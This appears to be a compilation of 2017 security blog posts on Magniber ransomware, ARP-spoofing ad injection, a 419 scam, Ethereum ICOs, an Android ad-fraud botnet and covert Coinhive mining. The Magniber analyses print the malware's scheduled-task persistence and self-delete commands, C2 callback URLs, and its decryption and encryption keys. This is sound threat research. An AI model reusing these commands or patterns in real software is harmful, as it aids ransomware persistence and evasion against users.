Magniber Ransomware Wants to Infect Only the Right People


Exploit kit (EK) use has been on the decline since late 2016;
however, certain activity remains consistent. The Magnitude Exploit
Kit is one such example that continues to affect users, particularly
in the APAC region.

In Figure 1, which is based on FireEye Dynamic threat Intelligence
(DTI) reports shared in March 2017, we can see the regions affected by
Magnitude EK activity during the last three months of 2016 and the
first three months of 2017.

Figure 1: Magnitude EK distribution as
seen in March 2017

This trend continued until late September 2017, when we saw
Magnitude EK focus primarily on the APAC region, with a large chunk
targeting South Korea. Magnitude EK activity then fell off the radar
until Oct. 15, 2017, when it came back and began focusing solely on
South Korea. Previously it had been distributing Cerber ransomware,
but Cerber distribution has declined (we have also seen a decline of
Cerber being distributed via email) and now it is distributing
ransomware known as Magniber.


The first reappearance of Magnitude EK on Oct. 15 came as a
malvertising redirection from the domain: fastprofit[.]loan. The
infection chain is shown in Figure 2.

Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was
first reported by FireEye as being used in Neutrino
Exploit Kit
after it was patched. Figure 3 shows the landing
page and CVE usage.

Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a
plain EXE (see Figure 4) and domain infrastructure is hosted on the
following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”

Figure 4: Magnitude payload header and
plain MZ response


In the initial report published
by our colleagues at Trend Micro
, the ransomware being
distributed is referred to as Magniber. These ransomware payloads only
seem to target Korean systems, since they won’t execute if the system
language is not Korean.

Magniber encrypts user data using the AES128. The sample used
(dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from
our DTI system when the campaign was active. Of note, this sample
differs from the hash shared publically by Trend Micro, but the two
exhibit the same behavior and share the infection vector, and both
were distributed around the same time.

The malware contains a binary payload in its resource section
encrypted in reverse using RC4. It starts unpacking it from the end of
the buffer to its start. Reverse RC4 decryption keys are 30 bytes long
and also contain non-ASCII characters. They are as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b,
      0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0,
      0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04,
      0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the
system language is not Korean, it exits (instructions can be seen in
Figure 5). After unpacking in memory, the malware starts executing the
unpacked payload.

Figure 5: Language check targeted at Korea

A mutex with name “ihsdj” is created to prevent multiple
executions. The payload then generates a pseudorandom 19-character
string based on the CPU clock from multiple GetTickCount calls.
The string is then used to create a file in the user’s %TEMP%
directory (e.g. “xxxxxxxxxxxxxxxxxxx.ihsdj”), which contains
the IV (Initialization Vector) for the AES128 encryption and a copy of
the malware itself with the name “ihsdj.exe”.

Next, the malware constructs 4 URLs for callback. It uses the
19-character long pseudorandom string it generated, and the following
domains to create the URLs:


In order to evade sandbox systems, the malware checks to see if it’s
running inside a VM and appends the result to the URL callback. It
does this by sandwiching and executing CPUID instructions (shown in
Figure 6) between RDTSC calls, forcing VMEXIT.

Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is done multiple times to gather the
average execution time of the CPUID, and if the average execution time
is greater than 1000, it considers the system to be a VM. In case the
test fails and the malware thinks the system is a VM, a “1”
is appended at the end of the URL (see Figure 7); otherwise,
“0” is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback
    domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0

Figure 7: Command and control communication

If the malware is executed a second time after encryption, the
callback URL ends in “end0” or “end1” instead of
“new”. An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system,
renaming them by adding a “.ihsdj” extension to the end. The
public key for the AES128 and IV for the sample analyzed are:

  • IV: EP866p5M93wDS513
  • Public Key AES128: S25943n9Gt099y4K

A text file “READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt”
is created in the user’s %TEMP% directory and shown to the user. The
ransom message is shown in Figure 8.

Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP%
with compatibility assistant, and loads the user message as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR
    “pcalua.exe -a %TEMP%ihsdj.exe
  • schtasks /create /SC
    MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR

The malware then issues a command to delete itself after exiting,
using the following local ping to provide delay for the deletion:

  • cmd /c ping localhost -n 3 > nul & del

Figure 9 contains the Python code for unpacking the malware payload,
which is encrypted using RC4 in reverse.

Figure 9: Python script for unpacking
malware payload


Ransomware is a significant threat to enterprises. While the current
threat landscape suggests a large portion of attacks are coming from
emails, exploit kits continue to put users at risk – especially those
running old software versions and not using ad blockers. Enterprises
need to make sure their network nodes are fully patched.


Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malverstiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains

Go to Source
Author: Muhammad Umair

ARP Spoofing Used to Insert Malicious Adverts

Recently we came across a new variant of the malware ServStart. ServStart is primarily used by attackers located in China, in a mix of targeted and opportunistic attacks. The attackers are hosting the ServStart malware on a file server that is open for anyone to view.

The open file server at http://222.186.11[.]182:9999

The Rar Archive

One of the files on the server, 11.rar, contains this batch script:

The file 哈迪斯技术组ARP工具(Hades Technology Group ARP Tools).bat

Zxarps – An ARP Spoofing Tool

This batch script executes a tool known as zxarps  ( Zxarps is an ARP spoofing tool that has been publicly available for over ten years.

It’s a fairly unusual tool, though familiar to anyone who played with hacking tools like Cain and Abel decades ago. ARP spoofing can be used to redirect traffic to an attacker controlled server.

A description of ARP spoofing, from Wikipedia

report from 2014 for an attack involving CVE-2014-6332 describes how an attacker might use zxarps well:

“This malware performs ARP spoofing on the network to cause other systems to route their traffic through the infected system, and inject a malicious IFRAME into webpages.”

The ARP spoofing attack can work in both directions. If a web-host is compromised, zxarps can be used to insert malicious code into other sites on the same web-host. A report from way back in 2009 describes attacks that operated this way:

“A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).”

We can see in the batch file that zxarps is attempting to insert Javascript from the URL http://www.mei988[.]com/yy.js.

Potentially infected sites

A quick Google for the malicious Javascript indicates a number of websites serving the malicious code. This may mean the attackers are running zxarps on their network.

All this.. Just to insert adverts for a Casino

Reviewing the injected code indicates it isn’t being used to serve malware, but simply to serve adverts for a Chinese casino:

If you’re reviewing malvertising on a website, and aren’t sure how it got there, this is another technique to consider.

Indicators of Compromise

Malicious files on the fileserver















You can view these indicators in AlienVault OTX


Go to Source

419 scammer offers USD $60 million—and a free child

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

Important discourse

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project.

I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account.

Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account.

Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting has meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

anyone for quidditch?

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

A fine sport

Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

Snape or Dumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Team Snape

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do— ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

Train time

I thought he might have Googled Hogwarts Express here, but my luck holds out:

Transportation trouble

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:


To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.


Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:


The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.

Go to Source
Author: Christopher Boyd

Magniber ransomware: exclusively for South Koreans

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples

Older sample

Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems with Korean language detected. The executable is pretty noisy, because it implements various tasks just by command line. Running it on the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can see also the ransom note and yet another file. Its name is the same as the part of the domain that has been generated for the particular user, and its extension is the same as the extension of the encrypted files:

To each encrypted file is added an extension that is composed of small Latin characters and is constant for the particular sample of Magniber.

The same plain-text makes the same cipher-text. This means each and every file is encrypted using exactly the same key.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version; it suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting domains that are generated by the built-in algorithm. The same domains that are used as CnC are later used for individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). In case of any other detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself

What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg 
onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm 
pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg 
aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch 
dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db 
mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp 
odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr 
crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu 
mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d 
fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr 
cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc 
dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 
fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt 
mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 
p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq 
sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb 
zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean 
bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err 
etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt 
fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf
kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man 
map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt 
psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf 
sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab 
tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt 
vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx
xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm 
apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc 
cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 
dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie 
ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx 
itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw 
jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct 
nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy 
cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf 
fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg
 gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx 
mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz 
tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb 
ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 
pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg 
ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli
 rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj 
spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip 
backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov
avi asf mpeg vob mpg wmv fla swf wav mp3 

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:documents and settingsall users 
:documents and settingsdefault user 
:documents and settingslocalservice 
:documents and settingsnetworkservice 
local settings 
publicmusicsample music 
publicpicturessample pictures 
publicvideossample videos 
tor browser 
program files (x86) 
program files 
system volume information 

How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

 The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending if the sample is running under the debugger or not (detected using time check).

Four domains are being queried for the key:

If any of them give a 16-byte long response, that means the valid key is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with the AES key hardcoded. However, it is used only as a backup if downloading the key from the CnC was for some reason impossible (that occurs also in the case if the public IP was not from Korea). The key is unique per each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

If any of them gives 16  byte long response, that means the valid key, it is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.

Similarly, the initialization vector is always hardcoded in the sample (but not downloaded). The same 16-character long string was also saved at the file beginning. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

First, the crypto context is initialized. The malware imports the key and initialization vector with the help of functions CryptImportKey, CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte long string at the beginning of the file. Then, the file is read chunk by chunk and encrypted using Windows Crypto API.


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, approaching the same targets. However, internally it has nothing in common with the Cerber and is much simpler. The only feature that makes it unique is being so picky about the targeted country. For the first time, we are seeing country checks being performed at various levels of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Go to Source
Author: hasherezade

Explainer: Smart contracts, Ethereum, ICO

Investing in cryptocurrency-funded projects is as hot as ever, and the almost complete absence of success hasn’t seemed to dim investors’ hopes one bit. In 2017 — with more than a full quarter to go — various project ICOs (that’s initial currency offerings) have already raised about $1.7 billion.

There aren’t too many successful projects to speak of, but investors remain optimistic, and cryptocurrencies like Ethereum may help explain why.

TOP-5 cryptocurrency capitalization and prices. Source

As you can see from the capitalization table above, Ethereum is a distant second to Bitcoin but miles ahead of other altcoins. In June 2017, the upstart almost overtook the mighty Bitcoin. What makes Ethereum so special, and why is it at the heart of the vast majority of ICOs this year?

The idea of Ethereum

From a user’s point of view, Bitcoin is nothing more than a payment system: Users transfer money to one another, and that’s about it. Ethereum goes beyond the simple payment-system framework, giving users the ability to write wallet-based programs.

These programs can receive money from wallets automatically, decide how much to send and where, and so forth — with one important condition: Each program operates the same for all users. The programs act according to known principles that are predictable, equal, transparent, and unmodifiable. Ethereum wallets come in two types: those managed by people and those run autonomously by programs.

The programs, also known as smart contracts, are written to the blockchain. Thus, a contract is stored forever, all users have a copy of it, and it is executed equally for every network participant that deals with it.

This innovation has significantly expanded blockchain currencies’ scope of application.

Examples of smart contracts

What programs can be written? Any you like. Take, for example, a financial pyramid. A pyramid’s smart contract might use the following rules:

  1. If sum x arrives from the address of wallet A, log it.
  2. If after that, sum y > 2x arrives from address B, send 2x money to address A, and log the debt to participant B.

And so on for each user and transaction that follows. Optionally, a rule could send 5% of all incoming money to the author of the smart contract.

Or how about an auction?

  1. If the auction is not over, log the addresses and bidding amounts of each participant.
  2. When the auction is over, select the maximum bid, announce the winner, and return all other bids.

Endless combinations of other entities and applications are possible: wallets with multiple owners, financial instruments, self-placing bets, polls, lotteries, games, casinos, notaries, and more.

Because of the blockchain, everyone can be sure that no one is cheating; everyone sees the program’s code and can track it working exactly as written. It will not make off with anyone’s money or go bankrupt (assuming, of course, there are no bugs or gremlins in the code).

Limitations of smart contracts

The smart contracts do, however, have significant limitations. Here are some of them:

  1. It’s very difficult to produce random numbers in a blockchain-based program, which affects lotteries.
  2. It’s not easy to hide certain information in blockchain — for example, auction participants or their bids. Blockchain was designed for transparency and sometimes it turns into disadvantage.
  3. If the contract requires information that is missing in the blockchain (e.g., the current exchange rate of a particular currency), then you have to trust a person who is adding this information to the blockchain.
  4. To interact with the contracts, users need ethers — the internal currency of Ethereum. Users without money wallets cannot take part in polls or any other Ethereum-based activities.
  5. Smart contracts work slowly. About 3 to 5 transactions per second can be performed worldwide — in total, not per participant.
  6. Any error in a smart contract stays forever. The only way to fix an error is to switch to another smart contract. However, this option must be included in the initial program, which is rarely the case.
  7. Smart contracts can freeze or fail to work as expected because program code can be difficult to understand, so writers may make critical errors — and users may not be able to tell what the code will actually do.

A simple Ethereum smart contract. Can you see the error that makes it possible to steal all of the money? Neither would most people.

Ultimately, much depends on the capabilities of smart contracts’ authors.

The main use of smart contracts

Pyramids, polls, casinos, lotteries — what’s not to like? But what smart contracts have really facilitated is IPO-style fundraising.

First of all, a smart contract lets you automate accounting. The contract logs how much money comes in and from whom, computes and distributes “shares,” and enables each participant to transfer and sell those shares.

Second, there’s no need to mess around with e-mail addresses, credit cards, card verification, investor authorization, and the like.

Finally, everyone can see how many shares were issued and how they were distributed among participants. The blockchain protects participants from project owners issuing additional shares secretly or someone selling one share multiple times to different people.

ICO — initial coin offering

As of January 1, 2017, one ether was worth $8, and the value peaked (for now, at least) at $400 by June. Gains were thanks to the large number of ICOs held as the initial offering of shares in startups. The desire to speculate in projects stimulated demand for the cryptocurrency — in this case, Ethereum. And such projects are now legion.

Ethereum price chart. Source

The typical cryptostartup follows this pattern:

  1. You have an idea, typically something cryptocurrency or blockchain related.
  2. You need money to get things off the ground.
  3. You announce to the public that you’re accepting ethers in exchange for shares (or tokens or whatever) under a smart contract.
  4. You advertise your project and raise the required sum.

The amount raised is usually $10 to $20 million, and it takes somewhere from a few minutes to a few days to collect. Typically, the ICO is limited in terms of time or amount raised, which causes a feeding frenzy.

Sometimes the frenzy reaches comic proportions. For example, one project ICO raised $35 million in 24 seconds. To get their fingers in the pie, project diehards paid up to $6,600 commission per transaction; the high demand for Ethereum combined with its low throughput hiked commission fees.

Crypto-investment payback

What happens next with tokens issued to investors depends on the project. Someone might promise to pay dividends on future profits; someone else might plan to accept the tokens as payment for project-related services. Another entrepreneur might promise nothing at all, like the Useless Ethereum Token‘s creator did, explicitly declaring that nobody gets anything in return and raising about $100,000 nevertheless.

Generally speaking, the tokens find their way onto the crypto–stock exchange, where they are traded. Those who missed out on the ICO can buy them there on the exchange, usually at a markup. Those who took part in the ICO in hopes of reselling at a profit can offload them on the exchange, where the regular economics of supply and demand apply (despite there being no product). One difference, however, is that no regulators exist in the crypto-industry, so shady means of inflating prices run rampant.

As I said at the beginning, there seems to be no more reason to jump into the ICO trend than any other get-rich-quick scheme — but now you understand some of the tech wizardry behind the excitement.

Go to Source
Author: Alexey Malanov

Android malware on Google Play adds devices to botnet and performs DDoS attacks

We have encountered a new and highly prevalent type of Android malware (detected as Android.Sockbot) posing as apps on Google Play and later adding compromised devices into a botnet. So far we have identified at least eight such apps, with an install base ranging from 600,000 to 2.6 million devices. This malware appears primarily targeting users in the United States, but also has a presence in Russia, Ukraine, Brazil, and Germany.

One of the malicious apps posing as a skin app for Minecraft PE

Figure. One of the malicious apps posing as a skin app for Minecraft PE

The legitimate purpose of the apps is to modify the look of the characters in Minecraft: Pocket Edition (PE). In the background, sophisticated and well-disguised attacking functionality is enabled. We set up network analysis of this malware in action and observed activity apparently aimed at generating illegitimate ad revenue.

The app connects to a command and control (C&C) server on port 9001 to receive commands. The C&C server requests that the app open a socket using SOCKS and wait for a connection from a specified IP address on a specified port. A connection arrives from the specified IP address on the specified port, and a command to connect to a target server is issued. The app connects to the requested target server and receives a list of ads and associated metadata (ad type, screen size name). Using this same SOCKS proxy mechanism, the app is commanded to connect to an ad server and launch ad requests.

There is no functionality within the application to display ads.

This highly flexible proxy topology could easily be extended to take advantage of a number of network-based vulnerabilities, and could potentially span security boundaries. In addition to enabling arbitrary network attacks, the large footprint of this infection could also be leveraged to mount a distributed denial of service (DDoS) attack.

There is a single developer account named FunBaster associated with this campaign. The malicious code is obfuscated and key strings are encrypted, thwarting base-level forms of detection. Additionally, the developer signs each app with a different developer key, which helps to avoid static analysis-based heuristics as well.

We notified Google Play of the presence of these malicious apps on October 6 and Google has confirmed these have been removed from the store.

Not all #Android #Minecraft PE skin apps are made equal. Some are malware in disguise. Choose carefully.CLICK TO TWEET


Symantec recommends mobile users observe the following security best practices:

  • Keep your software up to date.
  • Refrain from downloading apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by an app.
  • Install a suitable mobile security app, such as Norton Mobile Security, in order to protect your device and data.
  • Make frequent backups of important data.

Powered by WPeMatico

Unauthorized Coin Mining in the Browser

Cryptocurrencies have taken the world by storm, from the biggest player Bitcoin to newcomers such as Monero and Ethereum. Cryptocurrency mining has thus become a hot industry, from powerful, dedicated mining hardware to exploiting graphics card’s parallel computing power. Recently, browser coin mining has taken off, for a lot of different reasons. Although the computing power (per instance) is much less than dedicated hardware, being able to exploit many users on various sites more than make up for it. There are already quite some media coverage on them, such as BBC, and malwarebytes. While we do not consider crypto-currency mining inside browsers malicious by itself, it is often time that such mining is going on without the end user’s consent or even knowledge that makes this practice shady and despicable.

Coinhive, one of the more popular browser-mining services out there offers site owners a piece of JavaScript for easy integration. Site owners exploit site visitor’s CPU time to mine XMRs (Moneros) for Coinhive, and Coinhive pays out 70% of mined value to site owners. A new player, crypto-loot  emerged recently which offers similar services but pays out 88% of revenue.

Coinhive Integration

On the official Coinhive homepage, we found detailed documentation on how to integrate the mining scripts onto any given website. Owners can use the easy version:

var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');

or more complicated version that gives control over how the end user’s CPU time should be used, e.g. how many threads, should the mining throttle.

var miner = new CoinHive.User('YOUR_SITE_KEY', 'john-doe', {
    threads: 4,
    autoThreads: false,
    throttle: 0.8,
    forceASMJS: false

Higher thread number and/or lower throttle number will result in more CPU usage in client’s browser. With higher CPU occupation percentage, end users will likely experience sluggish behavior and poor experience on the websites.

Tracking Coinhive Integrations

We have been tracking the inclusion of Coinhive mining script (coinhive.min.js) for a week, in our PANDB unknown feed. The number of URLs leading to the download of such similar scripts is astounding. Since we started tracking, we have seen anywhere from 6K unique URLs to over 10K in one single day.

